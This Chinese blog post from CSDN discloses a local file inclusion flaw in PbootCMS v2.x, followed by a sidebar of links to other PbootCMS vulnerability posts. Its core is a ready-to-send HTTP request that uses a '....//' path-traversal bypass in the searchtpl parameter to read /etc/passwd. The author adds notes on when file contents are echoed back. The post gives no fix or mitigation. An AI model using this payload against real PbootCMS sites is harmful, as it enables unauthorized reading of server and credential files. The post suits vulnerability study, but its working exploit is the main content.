不是吧,PbootCMS v2.x也有本地文件包含漏洞呀!

最新推荐文章于 2024-07-23 16:45:27 发布
最新推荐文章于 2024-07-23 16:45:27 发布
阅读量3k 收藏
点赞数
分类专栏: 代码审计 文章标签: pbootcms 本地文件读取
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/he_and/article/details/102826475
版权


一份通用漏洞奉上,不成敬意

GET /pbootcms/index.php?search=&searchtpl=/....//....//....//....//....//....//etc/passwd HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/pbootcms/?search
Origin: http://localhost
Connection: close
Cookie: lg=cn; PbootSystem=2c1a845170112c22742dbd7286b72e99; Hm_lvt_f6f37dc3416ca514857b78d0b158037e=1572405857; Hm_lpvt_f6f37dc3416ca514857b78d0b158037e=1572405857
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

在这里插入图片描述这里既可以用get也可以用post请求,然后需要注意的是因为这个文件包含是将包含的内容写入一个缓存文件,然后再把缓存文件中的内容输出,这个缓存文件是原文件名的md5值,拼接.php后缀,所以,包含php文件是不会有回显的,只有包含文本文件才能看到回显

你看这个二维码,它好好看呀,好想用手机扫一下呀

tnt阿信
关注
专栏目录
PbootCMS 前台RCE漏洞复现
0xSec
12-07 3477
PbootCMS v
“PbootCMS漏洞揭秘:绕过登录检查获取管理员权限“
奇妙的Bug之旅
01-14 3343
PbootCMS是一款基于PHP开发的内容管理系统,提供了丰富的功能和模块,但也存在一些安全漏洞。本文将介绍并详细分析PbootCMS中的一个漏洞,同时提供一个完整的实例来展示漏洞的利用过程。本文详细介绍了PbootCMS中的一个漏洞,并提供了一个完整的实例来展示漏洞的利用过程。通过了解漏洞的原理和修复方法,我们可以更好地加强系统的安全性,保护网站和用户的信息安全。
利用cms渗透
最新发布
MachineGunJoe666
07-23 869
1.通过fofa查询出该网站的后台,进去发现很像某cms,利用御剑的cms识别工具识别出对方是phpcms的站。2.通过百度查询得出:该phpcms站点可能存在文件上传,敏感信息泄露,sql报错注入。我只验证出来了sql报错注入。3.把这几个链接转发到burp的重放器:1.1:获取Set-Cookie: aOqWU_siteid用的。1.2:sql报错注入转换为Set-Cookie:aOqWU_att_json用的。1.3:解密传输用的。
Goby漏洞更新 - PbootCMS 3.1.2 远程代码执行漏洞(CVE-2022-32417)
dzqxwzoe的博客
02-21 904
查看Goby更多漏洞:[Goby历史漏洞合集](https://github.com/gobysec/GobyVuls/blob/master/GobyVuls-PbootCMS是PbootCMS个人开发者的一款使用PHP语言开发的开源企业建站内容管理系统(CMS)。PbootCMS 3.1.2版本中存在安全漏洞,攻击者可通过该漏洞引发代码远程执行。3.1.2版本中存在安全漏洞,攻击者可通过该漏洞引发代码远程执行。如果你对网络安全入门感兴趣,那么你需要的话可以点击这里。
Goby漏洞更新 | PbootCMS 3.1.2 远程代码执行漏洞(CVE-2022-32417)
m0_46699477的博客
04-01 5910
PbootCMS是PbootCMS个人开发者的一款使用PHP语言开发的开源企业建站内容管理系统(CMS)。PbootCMS 3.1.2版本中存在安全漏洞,攻击者可通过该漏洞引发代码远程执行。
PbootCMS SQL注入漏洞
天行健,君子以自强不息
10-06 973
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
PbootCMS search SQL注入漏洞
孤桜懶契
07-13 4861
搜索框页面为 ✅ Payload为 https://gylq.gitee.io/time/
LTE-V2X_ASN.1.zip
04-27
在"LTE-V2X_ASN.1.zip"这个压缩包中,包含的"ASN.1-2017"和"ASN.1-2019"两个文件,很可能是ASN.1规范的两个不同版本。这些文档详细描述了V2X通信中的消息结构和编码规则,可能涵盖了各种V2X应用场景下的消息类型,如...
V2X应用层协议便准(day2)asn1.rar
12-29
在这个压缩包中,包含了V2X应用层ASN.1的一期和二期编码文件。这些文件包含了BSM(Basic Safety Message)、MAP(Map Data)以及二期扩展消息的定义。BSM是V2X通信的基础,用于车辆间共享实时安全信息,如位置、速度...
毕业设计 C-V2X漏洞挖掘 开放资源.zip
08-04
在cv2x-master这个文件夹中,可能包含了C-V2X的源代码、文档、测试用例或者工具,用于分析和挖掘漏洞。学习这些资料,我们可以了解C-V2X的实现细节,找出潜在的漏洞,并提出修复建议。同时,这也为安全研究人员提供...
RCE漏洞案例-PbootCMS1.3.2
c0529的博客
05-18 858
下载下来之后先看下md文件我们小皮上面设置好网站和数据库之后,在对应文件进行修改然后导入数据库文件之后我们直接打开网站我在这个时候遇到了两个问题1.一直显示php版本过低,我换了很多次都没办法2.显示没有带上php扩展gd扩展,这个我查看扩展是带了的我解决1的方法是不要带127.0.0.1这个前标去访问,改一下网站的域名,最好不要带特殊字符比如.这些的,可能容易造成浏览器的错误2的解决方法是换php的版本,我从5.5换到了7.0,终于登上 了。
PbootCMS XSS漏洞代码审计
afei001
10-05 1369
PbootCMS XSS漏洞代码审计
Goby 漏洞发布|PBOOTCMS /tag/index 代码执行漏洞
m0_46699477的博客
05-21 467
PbootCMS 是全新内核且永久开源免费的 PHP 企业网站开发建设管理系统,是一套高效、简洁、强悍的可免费商用的 PHP CMS 源码,能够满足各类企业网站开发建设的需要。攻击者可通过该漏洞在服务器端任意执⾏代码,写⼊后⻔,获取服务器权限,进⽽控制整个 web 服务器。
PbootCMS后台存储型XSS漏*洞复现 CVE-2020-20363
afei001
10-05 1305
PbootCMS是PbootCMS个人开发者的一款使用PHP语言开发的开源企业建站内容管理系统(CMS)。PbootCMS 存在跨站脚本漏洞,该漏洞源于产品的admin.php页面未对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。
最新0day! PbootCMS全版本后台通杀任意代码执行漏洞
Liyu_6618的博客
02-02 2773
最新0day! PbootCMS全版本后台通杀任意代码执行漏洞
保护你的网站:pbootcms漏洞修复详解
奇妙的Bug之旅
01-14 1968
通过升级pbootcms版本、修复已知漏洞、加强用户认证、输入验证和过滤以及安全的数据库操作,我们可以大大提高pbootcms系统的安全性。然而,安全是一个动态过程,我们应该时刻保持警惕并跟踪最新的安全漏洞和修复方法。同时,我们还应该过滤用户输入,以删除潜在的恶意代码。首先,我们需要确保我们使用的pbootcms版本是最新的。漏洞通常是通过已知的软件漏洞进行攻击的。因此,通过升级到最新版本,我们可以避免已知漏洞的风险。数据库操作是一个网站的核心功能,同时也是最容易受到注入攻击的地方之一。
【未公开】PbootCMS 前台 pbootcms_v310.sql 文件泄露
https://blog.echo234.cn/
04-09 994
PbootCMS是全新内核且永久开源免费的PHP企业网站开发建设管理系统,是一套高效、简洁、 强悍的可免费商用的PHP CMS源码,能够满足各类企业网站开发建设的需要。PbootCMS 前台 pbootcms_v310.sql 文件泄露。
PbootCMS 百度收录劫持跳转【js劫持】
刘登辉的博客
10-24 459
发下被劫持后就开始排查php代码,最后排查一个多小时没有用,找不到,因为之前index.php中过类似的劫持病毒,后来改了权限,恢复了源文件,现在找不到,没办法只能把数据库文件,配置文件备份,然后从官网下载最新版,把配置信息以及相关文件移动过去。找到用到的js文件,二分法排除,每次上传完一半之后就新开隐私模式重新搜索关键字,如果跳转,就再次二分排查,最后找到了: jquery.min.js 这个文件。网站用了开源免费的PbootCMS ,用了一段时间之后百度收录了网站,记录挺多的。
nightingale v2.x
08-11
Nightingale v2.x 是一款开源音乐播放器软件,源自于Nightingale 1.12.1 版本的继承和发展。它允许用户播放和管理音乐文件,同时还具备丰富的功能和可定制性。 Nightingale v2.x 构建在 XULRunner 和 Mozilla 技术之上,这使得它能够稳定运行在多个操作系统上,如Windows、Linux和Mac OS。 Nightingale v2.x 不仅具备基本的音乐播放功能,还支持创建和管理播放列表,可以根据用户的需求进行音乐分类和整理。用户可以通过拖放文件到播放列表、导入其他文件夹的音乐等方式快速添加音乐。 此外,Nightingale v2.x 还内置了一个强大的音频均衡器,可以根据个人喜好进行音频调整,以获得最佳的音乐体验。用户还可以通过插件系统扩展播放器的功能,例如添加歌词显示、艺术家信息等。 该软件还支持在线播放和收藏音乐,用户可以通过添加不同的音乐服务提供商(如SoundCloud和Last.fm)来获取更多的音乐资源。这使得用户可以方便地发现和收听自己喜欢的音乐。 总的来说,Nightingale v2.x 是一款强大且多功能的音乐播放器软件,通过其灵活的可定制性和丰富的功能,为用户提供了良好的音乐播放体验。无论是管理本地音乐文件还是在线收听音乐,它都能满足用户的需求。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值